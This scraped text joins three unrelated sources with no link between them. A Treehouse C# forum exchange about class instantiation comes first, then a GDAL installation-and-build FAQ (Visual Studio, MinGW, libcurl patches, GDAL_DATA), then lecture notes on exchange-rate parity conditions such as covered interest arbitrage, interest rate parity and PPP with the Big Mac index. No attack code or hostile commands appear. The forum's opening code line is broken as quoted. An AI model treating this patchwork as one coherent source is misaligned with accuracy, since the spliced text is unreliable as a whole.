namespace Treehouse.CodeChallenges { class Program { static void Main() { new Frog == Frog 'mike' //when you want to instantiate a class //class instancevariable = new kewyword class(), this will lead to the below //questions asks you to use the mike word for the instance variable //Frog mike = new Frog(); } } }
Ed H-P2,557 Points
William,
I had the same issue as you, and found the answer by removing a sneaky space I had between my class Frog and the (); , after I defined the new variable.
e.g. this was wrong: Frog mike = new Frog ();
but I removed the final space and Treehouse let me have it. My initial method was still valid, but not 100% grammatically/typographically correct.
:) | https://teamtreehouse.com/community/instantiation-2 | CC-MAIN-2020-05 | refinedweb | 183 | 58.96 |
FA GDAL with libcurl support?
- How can i add particular LDFLAGS with GDAL < 1.5
- I am having problem building with external libraries, where can I look?
- What is GDAL_DATA environment variable?
- How to set GDAL_DATA variable?
Where can I find development version of GDAL?
You can checkout it directly from SVN repository. Visit Downloading GDAL/OGR Source Wiki page for detailed instructions.
Can I get a MS Visual Studio Project file for GDAL?
The GDAL developers find it more convenient to build with makefiles and the Visual Studio NMAKE utility. Maintaining a parallel set of project files for GDAL is too much work, so there are no full project files directly available from the maintainers.
There are very simple project files available since GDAL/OGR 1.4.0 that just invoke the makefiles for building, but make debugging somewhat more convenient. These are the makegdal71.vcproj and makegdal80.vcproj files in the GDAL root directory. See Using Makefile Projects for details.
Occasionally other users do prepare full project files, and you may be able to get them by asking on the gdal-dev list. However, I would strongly suggest you just use the NMAKE based build system. With debugging enabled you can still debug into GDAL with Visual Studio.
Can I build GDAL with MS Visual C++ 2008 Express Edition?
Yes, since at least GDAL/OGR 1.5 this should be straight forward. Before proceeding with the normal NMAKE based build just ensure that the MSVC_VER macro near the top of gdal/nmake.opt is changed to 1500 to reflect the compiler version (Visual C++ 9.0). This will modify the build to skip the VB6 interfaces which depend on ATL components not available in the express edition.
Microsoft Express Edition Downloads
Can I build GDAL with MS Visual C++ 2005 Express Edition?
Yes, you can. It's also possible to use GDAL libraries in applications developed using Microsoft Visual C++ 2005 Express Edition.
- Download and install Visual C++ 2005 Express Edition. Follow instructions presented on this website:
- Download and install Microsoft Platform SDK. Also, follow these instructions carefully without omitting any of steps presented there:
- Add following two paths to Include files in the Visual C++ IDE settings. Do it the same way as presented in Step 3 from the website above.
C:\\Program Files\\Microsoft Platform SDK\\Include\\atl C:\\Program Files\\Microsoft Platform SDK\\Include\\mfc
- Since you will build GDAL from command line using nmake tool, you also need to set or update INCLUDE and LIB environment variables manually. You can do it in two ways:
- using the System applet available in the Control Panel
- by editing vsvars32.bat script located in
C:\Program Files\Microsoft Visual Studio 8\Common7\Tools\vsvars32.bat
These variables should have following values assigned:
INCLUDE=C:\\Program Files\\Microsoft Visual Studio 8\\VC\\Include; C:\\Program Files\\Microsoft Platform SDK\\Include; C:\\Program Files\\Microsoft Platform SDK\\Include\\mfc; C:\\Program Files\\Microsoft Platform SDK\\Include\\atl;%INCLUDE% LIB=C:\\Program Files\\Microsoft Visual Studio 8\\VC\\Lib; C:\\Program Files\\Microsoft Visual Studio 8\\SDK\\v2.0\\lib; C:\\Program Files\\Microsoft Platform SDK\\lib;%LIB%
NOTE: If you have edited system-wide INCLUDE and LIB variables, using System applet, every Console (cmd.exe) will have it properly set. But if you have edited them through vsvars32.bat script, you will need to run this script in the Console before every compilation.
- Patch atlwin.h header
At line 1725 add int i; declaration, so it looks as follows:
BOOL SetChainEntry(DWORD dwChainID, CMessageMap* pObject, DWORD dwMsgMapID = 0) { int i; // first search for an existing entry for(i = 0; i < m_aChainEntry.GetSize(); i++)
- Patch atlbase.h header
At line 287, comment AllocStdCallThunk? and FreeStdCallThunk? functions and add macros replacements:
/***************************************************") ***************************************************/ /* NEW MACROS */ #define AllocStdCallThunk() HeapAlloc(GetProcessHeap(),0,sizeof(_stdcallthunk)) #define FreeStdCallThunk(p) HeapFree(GetProcessHeap(), 0, p)
- Building GDAL
- Open console windows (Start -> Run -> cmd.exe -> OK)
- If you have edited vsvars32.bat script, you need to run it using full path:
C:\> "C:\\Program Files\\Microsoft Visual Studio 8\\Common7\\Tools\\vsvars32.bat" Setting environment for using Microsoft Visual Studio 2005 x86 tools
- Go to GDAL sources root directory, for example:
C:\> cd work\gdal
- Run nmake to compile
C:\work\gdal> nmake /f makefile.vc
- If no errors occur, after a few minutes you should see GDAL libraries in C:\work\gdal.
Now, you can use these libraries in your applications developed using Visual C++ 2005 Express Edition.
Can I build GDAL with Cygwin or MinGW?
GDAL should build with Cygwin using the Unix-like style build methodology. It is also possible to build with MinGW and MSYS though there might be complications. The following might work:
./configure --prefix=$PATH_TO_MINGW_ROOT --host=mingw32 \ --without-libtool --without-python $YOUR_CONFIG_OPTIONS
Using external win32 libraries will often be problematic with either of these environments - at the least requiring some manual hacking of the GDALmake.opt file.
Howto compile the (NG) Python bindings:
cd swig\python python setup.py build -c mingw32 cp build\lib.win32-2.5\* c:\python25\lib\site-packages\
(some details may need adjusting)
Howto compile the Perl bindings:
cd swig\perl perl Makefile.PL make.bat make.bat install
(the perl may need to be compiled with MinGW)
If you have swig, the bindings can be regenerated in MSYS prompt by command "make generate".
Can I build GDAL with Borland C or other C compilers?
These are not supported compilers for GDAL; however, GDAL is mostly pretty generic, so if you are willing to take on the onerous task of building an appropriate makefile / project file it should be possible. You will find most portability issues in the gdal/port/cpl_port.h file and you will need to prepare a gdal/port/cpl_config.h file appropriate to your platform. Using cpl_config.h.vc as a guide may be useful.
Why Visual C++ 8.0 fails with C2894 error in wspiapi.h when building GDAL with libcurl support?
Here is the complete error message of this issue:
C:\Program Files\Microsoft Visual Studio 8\VC\PlatformSDK\include\wspiapi.h(44) : error C2894: templates cannot be declared to have 'C' linkage
This is a known bug in the wspiapi.h header. One of possible solutions is to manually patch curl.h replacing lines 153 - 154
#include <winsock2.h> #include <ws2tcpip.h>
with the following code:
#ifdef __cplusplus } #endif #include <winsock2.h> #include <ws2tcpip.h> #ifdef __cplusplus extern "C" { #endif
This problem occurs in libcurl <= 7.17.1. Perhaps, later versions of libcurl will include this fix.
How can i add particular LDFLAGS with GDAL < 1.5
export the LNK_FLAGS variable with your habitual LDFLAGS content
export LNK_FLAGS=-Wl,-rpath=/foo/lib -l/foo/lib
I am having problem building with external libraries, where can I look?
There are additional hints and suggestions for building GDAL with various external support libraries in the BuildHints topic.
What is GDAL_DATA environment variable?
GDAL_DATA is an environment variable used to specify location of supporting files used by GDAL library as well as GDAL and OGR utilities. For instance, in order for OGR and GDAL to properly evaluate EPSG codes you need to have the EPSG support files (so called dictionaries, mostly in CSV format), like gcs.csv and pcs.csv, found in the directory pointed by GDAL_DATA variable.
How to set GDAL_DATA variable?
On Linux, assuming gdal/data supporting files are installed under /usr/local/share/gdal/data and Bash-like shell, export the variable as follows:
$ export GDAL_DATA=/usr/local/share/gdal
Refer to manual of your shell to learn how to set the GDAL_DATA variable permanently.
On Windows, assuming supporting files are located under C:\GDAL\data, in order to set the variable in current console session:
C:\> set GDAL_DATA=C:\GDAL\data
It's also possible to set GDAL_DATA variable permanently, as system-wide variable, so it's always available. Follow the instructions of How To Manage Environment Variable guide.. | http://trac.osgeo.org/gdal/wiki/FAQInstallationAndBuilding | CC-MAIN-2017-04 | refinedweb | 1,328 | 58.18 |
Hi,
I have a question on behaviour I'm seeing POSTing docs to the database but then not always
being able to immediately GET them. Generally it takes 2 attempts for a successful fetch.
I had assumed a POST is synchronous and document would then be immediately available.
Not sure if it makes a difference, delayed_commits is set to false currently. Though I've
tried both settings. I've looked at couch's durability matrix page and also assumed that is
outside the scope of this.
Thanks, Matt
>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Example output:
PUT '
Updating Key: test-key Response: 201
GET '
Getting Key: test-key Response: 404
PUT '
Updating Key: test-key Response: 201
GET '
Getting Key: test-key Response: 200
Taken 2 attempts to create.
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
{
println "Loading key: ${key}"
put(key, json)
def attempts = 1
while (!get(key)) {
attempts++
Thread.sleep(100);
put(key, json)
}
println "Taken ${attempts} attempts to create."
}
def put(String key, json) {
def params = [path: "/keys/${key}", body: json]
def response = client.put(params)
println "Updating Key: ${key} Response: ${response.status}"
}
def get(String key) {
def params = [path: "/keys/${key}"]
def response = client.get(params).data
println "Getting API Key: ${apiKey} Response: ${response.status}"
return response.data
}
________________________________
This email (including any attachments) is confidential and may be privileged. If you have
received it in error, please notify the sender by return email and delete this message from
your system. Any unauthorised use or dissemination of this message in whole or in part is
strictly prohibited. Please note that emails are susceptible to change and we will not be
liable for the improper or incomplete transmission of the information contained in this communication
nor for any delay in its receipt or damage to your system. We do not guarantee that the integrity
of this communication has been maintained nor that this communication is free of viruses,
interceptions or interference. | http://mail-archives.apache.org/mod_mbox/couchdb-user/201207.mbox/%3C4FF38556.1080303@wotifgroup.com%3E | CC-MAIN-2014-41 | refinedweb | 311 | 56.96 |
python 3x - assigning an automatically generated tkinterttklabel type variable to an array and retrieving it
I assigned an automatically generated tkinter.ttk.Label type variable to the array, and then assigned the automatically generated variable to the array to make it easier to handle later, but somehow the variable assigned to the array It has become a list typeError message
Applicable source codeApplicable source code
Traceback (most recent call last): File "address here", line 20, in<module> gui [i] .pack () AttributeError: 'list' object has no attribute 'pack'
TriedTried
from tkinter import Tk, ttk, PhotoImage root = Tk () img001 = PhotoImage (file = '# Image address here') # Display test label = ttk.Label (root, image = img001) label.pack () gui = [] # Automatically generate and assign to array for i in range (10): locals () ["t_% d"% i] = ttk.Label (root, image = img001) gui.append (["t_% d"% i]) # Direct display of one of the automatically generated variables t_5.pack () #Type confirmation print (type (t_5)) # here tkinter.ttk.Label type print (gui) print (gui [5]) print (type (gui [5])) # list type here #Display variables assigned to array for i in range (10): gui [i] .pack () # Error here
I tried adding locals () in front of the gui array, but I got an invalid syntax error. . I wonder what I should do sweat
Please give me a solution ...
- Answer # 1
- Answer # 2
Cause
Incorrect:
gui.append (["t_% d"% i])
Correct:
gui.append (locals () ["t_% d"% i])
If you write in error, the value that is appended will be a "list with str as element" like
["t_0"]. The previous line assignment statement is
Is it
locals () ["t_% d"% i] = ttk.Label (root, image = img001)
? This is for example when i is 0
It has the same meaning as described as
t_0 = ttk.Label (root, image = img001)
. The value to be added as an element of gui is the left side of this assignment statement, that is, the variable
t_0(or
locals () ["t_% d"% i])
If you do not write
gui.append (t_0)... (A)
Or
gui.append (locals () ["t_% d"% i])... (B)
, the meaning will change. In the actual code, i is substituted while changing i in the loop, so it is necessary to write (B) instead of (A).Personal opinion (dynamic access of
localvariables by locals)
Since we want to access multiple instances of Label like "i-th label", we treat it as a list, and such things as
local variable through locals (). I think that the following code is sufficient.
from tkinter import Tk, ttk, PhotoImage root = Tk () img001 = PhotoImage (file = 'img001.png') gui = [] # Create multiple labels (and store them as list elements) for i in range (10): # No need to create local variables t_0, t_1 etc. using locals gui.append (ttk.Label (root, image = img001)) # place all labels stored in list in order for i in range (10): gui [i] .pack () root.mainloop ()
Snacks:
(1) The value type of variable gui is not an array but a list. There is nothing wrong with saying an array, but it is inaccurate.
(2) In the current code, the gui element is a label. Variable names seem more natural than labels, such as gui.
(3) Strictly speaking, pack is a function to "place" a widget instead of "display".
(Since it will be displayed as a result of placement, I will not say it is a mistake)
(4) The original code uses full-width
#to indicate a comment. It may have been the intention to use full-width (?) Consciousness that `` use half-width # will be a headline in the StackOverflow markdown specification '', but inside the markdown for code such as There is no need to worry about it, so please write it in
#according to the Python specification. Otherwise, it will be very troublesome for viewers to copy and paste. If you don't rewrite full-width
#to half-width
#, you will get a syntax error ...
Addition: I noticed the inadequacy of my answer in the comment section of hayataka2049's answer.
Dynamic creation of local variables is not possible with
locals () [variable name] = value.
However, if you use
locals ()in the global scope, the result is a dict object that represents the global variable namespace (and the global variable namespace is the responsibility of the dict object itself). Dynamic generation of is possible. But in the first place
locals () [variable name] = valueshould be used instead of
globals () [variable name] = valuethink. In any case, the necessity of using "dynamic generation of variables" is as it was commented in the first answer that it is not necessary in this case.
Related articles
- python - i want to answer questions automatically in google classroom, but i can't use the api please give me some advice
- macos (osx) - code is not automatically generated when adding a view controller in xamarinmac
- python - i want to automatically answer microsoft froms using selenium
- python - about assigning values to fields with foreign keys in django
- python chord i want to display a spectrogram of the generated sound
- python - i want to automatically log in to soundcloud
- html - the reason why name and id are automatically generated when rails file_field is used
- about python randomly generated bubble sort
- python 3x - python i want to create a message box that closes automatically
- python - i want to automatically delete the backed up files after a few days
- i want to automatically generate a password with python and record it in a text file
- python - i want to automatically enter a value in create view of django
- think too hard.
Do not try locals () or dynamic variable name generation, because the code looks bad and immediately causes strange behavior. | https://www.tutorialfor.com/questions-100877.htm | CC-MAIN-2020-40 | refinedweb | 932 | 60.45 |
L.
Accept the node.
Interrupt the normal processing of the document.
Reject the node and its children.
Skip this single node. The children of this node will still be considered.
This method will be called by the parser at the completion of the
parsing of each node. The node and all of its descendants will exist
and be complete. The parent node will also exist, although it may be
incomplete, i.e. it may have additional children that have not yet
been parsed. Attribute nodes are never passed to this function.
From within this method, the new node may be freely modified - children may be added or removed, text nodes modified, etc. The state of the rest of the document outside this node is not defined, and the affect of any attempt to navigate to, or to modify any other part of the document is undefined.
For validating parsers, the checks are made on the original document, before any modification by the filter. No validity checks are made on any document modifications made by the filter.
If this new node is rejected, the parser might reuse the new node and any of its descendants..
Tells the
LSParser what types of nodes to show to the
method
LSParserFilter.acceptNode. If a node is not shown
to the filter using this attribute, it is automatically included in
the DOM document being built. See
NodeFilter for
definition of the constants. The constants
SHOW_ATTRIBUTE
,
SHOW_DOCUMENT,
SHOW_DOCUMENT_TYPE,
SHOW_NOTATION,
SHOW_ENTITY, and
SHOW_DOCUMENT_FRAGMENT are meaningless here. Those nodes
will never be passed to
LSParserFilter.acceptNode.
The constants used here are defined in [DOM Level 2 Traversal and Range] .
The parser will call this method after each
Element start
tag has been scanned, but before the remainder of the
Element is processed. The intent is to allow the
element, including any children, to be efficiently skipped. Note that
only element nodes are passed to the
startElement
function.
The element node passed to
startElement for filtering
will include all of the Element's attributes, but none of the
children nodes. The Element may not yet be in place in the document
being constructed (it may not have a parent node.)
A
startElement filter function may access or change
the attributes for the Element. Changing Namespace declarations will
have no effect on namespace resolution by the parser.
For efficiency, the Element node passed to the filter may not be the same one as is actually placed in the tree if the node is accepted. And the actual node (node object identity) may be reused during the process of reading in and filtering a document.. | http://developer.android.com/reference/org/w3c/dom/ls/LSParserFilter.html | CC-MAIN-2014-52 | refinedweb | 434 | 65.42 |
PARITY CONDITIONS. IRP, PPP, IFE, EH & RW. Arbitrage in FX Markets. Arbitrage Definition It is an activity that takes advantages of pricing mistakes in financial instruments in one or more markets. It involves no risk and no capital of your own . There are 3 kinds of arbitP, PPP, IFE, EH & RW
Arbitrage Definition
It is an activity that takes advantages of pricing mistakes in financial instruments in one or more markets. It involves no risk and no capital of your own.
(1) Local (sets uniform rates across banks)
(2) Triangular (sets cross rates)
(3) Covered (sets forward rates)
Note: The definition presents the ideal view of (riskless) arbitrage. “Arbitrage,” in the real world, involves some risk. We’ll call this arbitrage pseudo arbitrage.
Local Arbitrage (One good, one market)
Example: Suppose two banks have the following bid-ask FX quotes:
Bank A Bank B
USD/GBP 1.50 1.51 1.53 1.55
Sketch of Local Arbitrage strategy:
(1) Borrow USD 1.51
(2) Buy a GBP from Bank A
(3) Sell GBP to Bank B
(4) Return USD 1.51 and make a USD .02 profit (1.31%)
Note I: All steps should be done simultaneously. Otherwise, there is risk! (Prices might change).
Note II: Bank A and Bank B will notice a book imbalance. Bank A will see all activity at the ask side (buy GBP orders) and Bank B will see all the activity at the bid side (sell GBP orders). They adjust the quotes. For example, Bank A can increase the ask quote to 1.54 USD/GBP. ¶
Note II: Bank A and Bank B will notice a book imbalance.
- Bank A will see all activity at the ask side (buy GBP orders). - Bank B will see all activity at the bid side (sell GBP orders).
They will adjust the quotes. For example, Bank A can increase the ask quote to 1.54 USD/GBP. ¶
Triangular Arbitrage (Two related goods, one market)
Example: Suppose Bank One gives the following quotes:
St = 100 JPY/USD
St = 1.60 USD/GBP
St = 140 JPY/GBP
Take the first two quotes. Then, the no-arbitrage JPY/GBP quote should be SNAt = 160 JPY/GBP
At St = 140 JPY/GBP, Bank One undervalues the GBP against the JPY (with respect to the first two quotes). <= This is the pricing mistake!
Sketch of Triangular Arbitrage (Key: Buy undervalued GBP with the overvalued JPY):
(1) Borrow USD 1
(2) Sell the USD for JPY 100 (at St = 100 JPY/USD)
(3) Sell the JPY for GBP (at St = 140 JPY/GBP). Get GBP 0.7143
(4) Sell the GPB for USD (at St = 1.60 USD/GBP). Get USD 1.1429
=> Profit: USD 0.1429 (14.29% per USD borrowed).
Covered Interest Arbitrage(4 instruments: 2 goods per market and 2 markets)
Open the third section of the WSJ: Brazilian bonds yield 10% and Japanese bonds 1%.
Q: Why wouldn't capital flow to Brazil from Japan?
A: FX risk: Once JPY are exchanged for BRL (Brazilian reals), there is no guarantee that the BRL will not depreciate against the JPY.
=> The only way to avoid this FX risk is to be covered with a forward FX contract.
Intuition: Let’s suppose today, at t=0, we have the following data:
iJPY = 1% for 1 year (T=1 year)
iBRL = 10% for 1 year (T=1 year)
St = .025 BRL/JPY
Strategy to take “advantage” of the interest rate differential:
Today, at time t=0, we do the following:
(1) Borrow JPY 1000 at 1% for 1 year.
(At T=1 year, we will need to repay JPY 1010.)
(2) Convert to BRL at .025 BRL/JPY. Get BRL 25.
(3) Deposit BRL 25 at 10% for 1 year.
(At T=1 year, we will receive BRL 27.50.)
At time T=1 year, we do the final step:
(4) Exchange BRL 27.50 for JPY at ST=1-year
=> Profit = BRL 27.50 * ST=1-year – JPY 1010
Problem with this strategy: It is risky => today, we do not know ST=1-year
Suppose at t=0, a bank offers Ft,1-year = .026 BRL/JPY.
Then, at time T=1 year, we do the final step:
(4) Exchange BRL 27.50 for JPY at 026 BRL/JPY.
=> We get JPY 1057.6923
=> Profit = JPY 1057.6923 – JPY 1010 = JPY 47.8
Now, instead of borrowing JPY 1000, we will try to borrow JPY 10 billion (and make a JPY 480M profit) or more.
Obviously, no bank will offer a .026 JPY/BRL forward contract!
=> Banks will offer Ft,1-year contracts that produce non-positive profits for arbitrageurs.
Q: How do banks price FX forward contracts?
A: In such a way that arbitrageurs cannot take advantage of their quotes.
To price a forward contract, banks consider covered arbitrage strategies.
Notation:
id = domestic nominal T days interest rate (annualized).
if = foreign nominal T days interest rate (annualized).
St = time t spot rate (direct quote, for example USD/GBP).
Ft,T = forward rate for delivery at date T, at time t.
Note: In developed markets (like the US), all interest rates are quoted on annualized basis.
Now, consider the following (covered) strategy:
1. At t=0, borrow from a foreign bank 1 unit of a FC for T days.
at time T, We pay the foreign bank (1+if x T/360) units of the FC.
2. At t=0, exchange FC 1 = DC St.
3. Deposit DC St in a domestic bank for T days.
at time T, we receive DC St(1+idxT/360).
4. At t=0, buy a T-day forward contract to exchange DC for FC at a Ft,T.
at time T, we exchange the DC St(1+idxT/360) for FC, using Ft,T.
We get St(1+id x T/360)/Ft,T units of foreign currency.
This strategy will not be profitable if, at time T, what we receive in FC is less or equal to what we have to pay in FC. That is, arbitrage will force: :
St (1 + id x T/360)/Ft,T = (1 + if x T/360).
Solving for Ft,T, we obtain the following expression:
This equation represents the Interest Rate Parity Theorem or IRPT.
It is common to use the following linear IRPT approximation:
Ft,T St [1 + (id - if) x T/360].
This linear approximation is quite accurate for small differences in id - if.
Example: Using IRPT.
St = 106 JPY/USD.
id=JPY = .034.
if=USD = .050.
T = 1 year
=>Ft,1-year = 106 JPY/USD x (1+.034)/(1+.050) = 104.384 JPY/USD.
Using the linear approximation:
Ft,1-year 106 JPY/USD x (1 - .016) = 104.304 JPY/USD.
Example: Violation of IRPT at work.
St = 106 JPY/USD.
id=JPY = .034.
if=USD = .050.
Ft,one-year-IRP = 106 JPY/USD x (1 - .016) = 104.304 JPY/USD.
Suppose Bank A offers: FAt,1-year= 100 JPY/USD.
FAt,1-year= 100 JPY/USD< Ft,1-year-IRP (a pricing mistake!)
The forward USD is undervalued against the JPY.
Take advantage of Bank A’s overvaluation: Buy USD forward.
Sketch of a covered arbitrage strategy:
(1) Borrow USD 1 from a U.S. bank for one year
(2) Exchange the USD for JPY
(3) Deposit the JPY in a Japanese bank.
(4) Buy USD forward (Sell forward JPY) at FAt,1-yr.
At T = 1 year, sell the JPY received from the Japanese bank at Ft,1-yr and repay the U.S. bank in USD.
After one year, the U.S. investor realizes a risk-free profit of USD. 046 per USD borrowed.
Note: Arbitrage will ensure that Bank A’s quote quickly converges to Ft,1-yr-IRP = 104.3 JPY/USD. ¶
The Forward Premium and the IRPT
Reconsider the linearized IRPT. That is,
Ft,T St [1 + (id - if) x T/360].
A little algebra gives us:
(Ft,T-St)/St x 360/T (id - if)
Let T=360. Then,
p id - if.
Note: p measures the annualized % gain/loss of buying FC spot and selling it forward. The opportunity cost of doing this is given by id-if.
Equilibrium: p exactly compensates (id - if)
→ No arbitrage opportunities → No capital flows.
Under the linear approximation, we have the IRP Line
id -if
IRP Line
B (Capital inflows)
A
(Capital outflows)
45º
p (forward premium)
Look at point A: p > id – if (or p + if > id),
=> Domestic capital fly to the foreign country
(what an investor loses on the lower interest rate, if, is more than
compensated by the high forward premium, p).
IRPT with Bid-Ask Spreads
Exchange rates and interest rates are quoted with bid-ask spreads.
Consider a trader in the interbank market:
She will have to buy or borrow at the other party's ask price.
She will sell or lend at the bid price.
There are two roads to take for arbitrageurs:
(1) borrow domestic currency
(2) borrow foreign currency.
• Bid’s Bound: Borrow Domestic Currency
(1) A trader borrows DC 1 at time t=0, and repays 1+iask,d at time=T.
(2) Using the borrowed DC 1, she can buy spot FC at (1/Sask,t).
(3) She deposits the FC at the foreign interest rate, ibid,f.
(4) She sells the FC forward for T days at Fbid,t,T
This strategy would yield, in terms of DC:
(1/Sask,t) (1+ibid,f) Fbid,t,T.
In equilibrium, this strategy should yield no profit. That is,
(1/Sask,t) (1+ibid,f) Fbid,t,T (1+iask,d).
Solving for Fbid,t,T,
Fbid,t,T Sask,t [(1+iask,d)/(1+ibid,f)] = Ubid.
• Ask’s Bound: Borrow Foreign Currency
(1) The trader borrows FC 1 at time t=0, and repay 1+iask,f.
(2) Using the borrowed FC 1, she can buy spot DC at Sask,t.
(3) She deposits the DC at the domestic interest rate, ibid,d.
(4) She buys the FC forward for T days at Fask,t,T
Following a similar procedure as the one detailed above, we get:
Fask,t,T Sbid,t [(1+ibid,d)/(1+iask,f)] = Lask.
Example: IRPT bounds at work.
Data: St = 1.6540-1.6620 USD/GBP
iUSD = 7¼-½,
iGBP = 8 1/8–3/8,
Ft,one-year= 1.6400-1.6450 USD/GBP.
Check if there is an arbitrage opportunity (we need to check the bid’s bound and ask’s bound).
i) Bid’s bound covered arbitrage strategy:
1) Borrow USD 1 at 7.50% for 1 year
=> Repay USD 1.07500 in 1 year.
2) Convert to GBP & get GBP 1/1.6620 = GBP 0.6017
3) Deposit GBP 0.6017 at 8.125%
4) Sell GBP forward at 1.64 USD/GBP
=> we get (1/1.6620) x (1 + .08125)x1.64 = USD 1.06694
=> No arbitrage: For each USD borrowed, we lose USD .00806.
ii) Ask’s bound covered arbitrage strategy:
1) Borrow GBP 1 at 8.375% for 1 year => we will repay GBP 1.08375.
2) Convert to USD & get USD 1.6540
3) Deposit USD 1.6540 at 7.250%
4) Buy GBP forward at 1.645 USD/GBP
=> we get 1.6540x(1 + .07250)x(1/1.6450) = GBP 1.07837
=> No arbitrage: For each GBP borrowed, we lose GBP 0.0054.
Note: The bid-ask forward quote is consistent with no arbitrage. That is, the forward quote is within the IRPT bounds. Check:
Ubid = Sask,t[(1+iask,d)/(1+ibid,f)] = 1.6620x[1.0750/1.08125]
= 1.6524 USD/GBP Fbid,t,T = 1.6400 USD/GBP.
Lask = Sbid,t[(1+ibid,d)/(1+iask,f)] = 1.6540x[1.0725/1.08375]
= 1.6368 USD/GBP Fask,t,T = 1.6450 USD/GBP. ¶
A trader is not able to find a specific forward currency contract.
This trader might be able to replicate the forward contract using a spot currency contract combined with borrowing and lending.
This replication is done using the IRP equation.
Example: Replicating a USD/GBP 10-year forward contract.
iUSD,10-yr = 6%
iGBP,10-yr = 8%
St = 1.60 USD/GBP
T = 10 years.
Ignoring transactions costs, she creates a 10-year (implicit quote) forward quote:
1) Borrow USD 1 at 6% for 10 years
2) Convert to GBP at 1.60 USD/GBP
3) Invest in GBP at 8% for 10 years
Transactions to create a 10-year (implicit) forward quote:
1) Borrow USD 1 at 6%
2) Convert to GBP at 1.60 USD/GBP (GBP 0.625)
3) Invest in GBP at 8%
Cash flows in 10 years:
(1) Trader will receive GBP 1.34933 (=1.0810/1.60)
(2) Trader will have to repay USD 1.79085 (= 1.0610)
We have created an implicit forward quote:
USD 1.79085/ GBP 1.34933 = 1.3272 USD/GBP. ¶
Or
Ft,10-year = St [(1+id,10-year)/(1+if,10-year)]10
= 1.60 USD/GBP [1.06/1.08]10 = 1.3272 USD/GBP. ¶
Synthetic forward contracts are very useful for exotic currencies.
- Inflation rates differentials (IUSD - IFC) PPP
- Interest rate differentials (iUSD - iFC) IFE
- Income growth rates (yUSD - yFC) Monetary Approach
- Trade flows Balance of Trade
- Other: trade barriers, expectations, taxes, etc.
• Usual monthly percentage change –i.e., the mean- is a 0.9% appreciation of the USD (annualized -11.31% change). The SD is 4.61%.
• These numbers are the ones to match with our theories for St. A good theory should predict an annualized change close to -11% for st.
Purchasing Power Parity (PPP)
PPP is based on the law of one price (LOP): Goods once denominated in the same currency should have the same price. If they are not, then arbitrage is possible.
Example: LOP for Oil.
Poil-USA = USD 80.
Poil-SWIT = CHF 160.
StLOP = USD 80 / CHF 160 = 0.50 USD/CHF.
If St = 0.75 USD/CHF, then a barrel of oil in Switzerland is more expensive -once denominated in USD- than in the US:
Poil-SWIT (USD) = CHF 160 x 0.75 USD/CHF = USD 120 > Poil-USA
Traders will buy oil in the US (and export it to Switzerland) and sell the US oil in Switzerland.
This movement of oil will increase the price of oil in the U.S. and also will appreciate the USD against the CHF. ¶
Note I: LOP gives an equilibrium exchange rate.
Equilibrium will be reached when there is no trade
in oil (because of pricing mistakes). That is, when
the LOP holds for oil.
Note II: LOP is telling what Stshould be (in equilibrium). It is not telling what Stis in the market today.
Note III: Using the LOP we have generated a model for St. We’ll call this model, when applied to many goods, the PPP model.
Solution: Use baskets of goods.
PPP: The price of a basket of goods should be the same across countries, once denominated in the same currency. That is, USD 1 should buy the same amounts of goods here (in the U.S.) or in Colombia.
Absolute version of PPP: The FX rate between two currencies is simply the ratio of the two countries' general price levels:
StPPP = Domestic Price level / Foreign Price level = Pd / Pf
Example: Law of one price for CPIs.
CPI-basketUSA = PUSA = USD 755.3
CPI-basketSWIT = PSWIT = CHF 1241.2
StPPP= USD 755.3/CHF 1241.2 = 0.6085 USD/CHF.
If St 0.6085 USD/CHF, there will be trade of the goods in the basket between Switzerland and US.
StPPP= USD 755.3/CHF 1241.2 = 0.6085 USD/CHF.
Suppose St = 0.70 USD/CHF > StPPP.
Then, PSWIT (in USD) = CHF 1241.2*0.70 USD/CHF
= USD 868.70 > PUSA = USD 755.3
Potential profit: USD 868.70 – USD 755.3 = USD 93.40
Traders will do the following pseudo-arbitrage strategy:
1) Borrow USD
2) Buy the CPI-basket in the US
3) Sell the CPI-basket, purchased in the US, in Switzerland.
4) Sell the CHF/Buy USD
5) Repay the USD loan, keep the profits. ¶
Note: “Equilibrium forces” at work: 2) PUSA ↑; 3) PSWIT ↓; (& StPPP↑);4) St ↓.
The absolute version of the PPP theory is expressed in terms of St, the nominal exchange rate.
We can modify the absolute version of the PPP relationship in terms of the real exchange rate, Rt. That is,
Rt= St Pf / Pd.
Rt allows us to compare prices, translated to DC:
If Rt> 1, foreign prices (translated to DC) are more expensive
If Rt = 1, prices are equal in both countries –i.e., PPP holds!
If Rt < 1, foreign prices are cheaper
Economists associate Rt > 1 with a more efficient domestic economy.
Pf = CHF 6.23
Pd = USD 3.58
St = 1.012 USD/CHF.
Rt= St PSWIT / PUS =1.012USD/CHF x CHF 6.23/USD 3.58 = 1.7611.
Taking the Big Mac as our basket, the U.S. is more competitive than Switzerland. Swiss prices are 76.11% higher than U.S. prices, after taking into account the nominal exchange rate.
To bring the economy to equilibrium –no trade in Big Macs-, we expect the USD to appreciate against the CHF.
According to PPP, the USD is undervalued against the CHF.
=> Trading signal: Buy USD/Sell CHF. ¶
1) It is a standardized, common basket: beef, cheese, onion, lettuce, bread, pickles and special sauce. It is sold in over 120 countries.
Big Mac (Sydney) Big Mac (Tokyo)
2) It is very easy to find out the price.
3) It turns out, it is correlated with more complicated common baskets, like the PWT (Penn World Tables) based baskets.
Using the CPI basket may not work well for absolute PPP. The CPI baskets can be substantially different. In theory, traders can exploit the price differentials in BMs.
UH to Rapperswill, CH
• This is not realistic. But, the components of a BM are internationally traded. The LOP suggests that prices of the components should be the same in all markets.
The Economist reports the real exchange rate: Rt = StPBigMac,f/PBigMac,d.
For example, for Norway’s crown (NOK): Rt = 7.02/3.58 = 1.9609 => (96.09% overvaluation)
Example: (The Economist’s) Big Mac Index
StPPP= PBigMac,d / PBigMac,f
(The Economist reports the real exchange rate: Rt = StPBigMac,f/PBigMac,d.)
• Empirical Evidence: Simple informal test:
Test: If Absolute PPP holds => Rt= 1.
In the Big Mac example, PPP does not hold for the majority of countries.
Several tests of the absolute version have been performed: Absolute version of PPP, in general, fails (especially, in the short run).
• Absolute PPP: Qualifications
(1) PPP emphasizes only trade and price levels. Political/social factors (instability, wars), financial problems (debt crisis), etc. are ignored.
(2) Implicit assumption: Absence of trade frictions (tariffs, quotas, transactions costs, taxes, etc.).
